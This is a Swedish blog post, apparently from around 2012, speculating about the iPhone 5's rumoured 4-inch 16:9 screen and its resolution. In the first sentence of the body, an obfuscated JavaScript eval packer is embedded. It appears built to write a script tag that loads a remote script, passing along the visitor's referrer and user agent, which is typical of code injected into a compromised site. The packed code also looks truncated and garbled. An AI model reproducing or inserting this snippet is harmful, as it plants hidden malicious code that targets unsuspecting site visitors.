Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Rykte: Så här kommer iPhone 5 se ut

Rykte: Så här kommer iPhone 5 se ut
Sebastian

Rykten eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iezyy|var|u0026u|referrer|ftras||js|php’.split(’|’),0,{}))
om den kommande iPhone 5 är i full spin. Senaste säger att iPhone kommer att ha en 4 tum skärm med formatet 16:9 vilket vi idag har på våra tv-apparater.

Om Apple nu får till detta kommer iPhone 5 troligen se ut som på bilden ovan. Faktiskt ganska snygg. Det enda man kan fundera lite över är ifall hemknappen verkligen kommer vara oval.

Pixeltätheten på 326 ppi (pixlar per tum) skulle då behållas samt även antalet pixlar på bredden. Dock skulle vi få 176 pixlar extra på höjden som ger en upplösning på 1136 x 640 mot dagens 960 x 640.

John Gruder på Daring Fireball hade för någon dag sedan ett bra blogginlägg som förklarade hur Apple troligen kommer genomföra sin lansering. Det ryktades även om iPhone 5 i iMore via ett läsvärt blogginlägg där ideér och tankar gick omkring hur denna iPhone 5 skulle kunna se ut och fungera.

Vad tror ni? Är bilden ovan något i närhet av det vi väntar oss?